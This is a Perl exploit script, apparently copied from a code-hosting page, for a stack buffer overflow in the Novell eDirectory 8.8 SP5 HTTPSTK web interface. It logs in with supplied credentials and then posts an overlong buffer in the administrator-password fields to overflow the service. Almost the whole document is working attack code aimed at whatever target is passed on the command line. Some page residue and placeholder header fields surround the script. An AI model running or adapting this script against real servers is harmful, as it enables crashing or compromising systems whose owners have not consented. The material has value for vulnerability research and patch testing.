79 lines
No EOL
1.6 KiB
Perl
Executable file
79 lines
No EOL
1.6 KiB
Perl
Executable file
# Exploit Title: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability
|
|
# Date: 2009-11-17
|
|
# Author: karak0rsan
|
|
# Software Link: [downoad link if available]
|
|
# Version: Novell eDirectory 8.8 SP5 HTTPSTK
|
|
# Tested on: [relevant os]
|
|
# Code : [exploit code]
|
|
|
|
#!usr\bin\perl
|
|
# Novell eDirectory 8.8 SP5 HTTPSTK BoF Vuln - 0day
|
|
# Vulnerability found in Hellcode Labs.
|
|
# karak0rsan || murderkey
|
|
# info[at]hellcode.net || www.hellcode.net
|
|
|
|
|
|
use WWW::Mechanize;
|
|
|
|
use LWP::Debug qw(+);
|
|
|
|
use HTTP::Cookies;
|
|
use HTTP::Request::Common;;
|
|
|
|
$target=$ARGV[0];
|
|
|
|
|
|
if(!$ARGV[0]){
|
|
|
|
print "Novell eDirectory 8.8 SP5 Exploit\n";
|
|
|
|
print "Hellcode Research || Hellcode.net\n";
|
|
|
|
print "Usage:perl $0 [target]\n";
|
|
|
|
exit();
|
|
}
|
|
print "Username:";
|
|
|
|
$username = <STDIN>;
|
|
|
|
chomp($username);
|
|
|
|
print "Password:";
|
|
|
|
$password = <STDIN>;
|
|
|
|
chomp($password);
|
|
|
|
|
|
$login_url = "$target/_LOGIN_SERVER_";
|
|
|
|
$url = "$target/dhost/httpstk;submit";
|
|
|
|
$buffer = "\x41" x 476;
|
|
|
|
my $mechanize = WWW::Mechanize->new();
|
|
|
|
|
|
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
|
|
|
|
|
|
$mechanize->timeout($url_timeout);
|
|
|
|
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
|
|
|
|
|
|
$mechanize->submit_form(
|
|
|
|
form_name => "authenticator",
|
|
|
|
fields => {
|
|
|
|
usr => $username,
|
|
|
|
pwd => $password},
|
|
|
|
button => 'Login');
|
|
|
|
$res2 = $mechanize->request(HTTP::Request->new('GET', "$url"));
|
|
$res2 = $mechanize->request(POST "$url", [sadminpwd => $buffer, verifypwd => $buffer]); |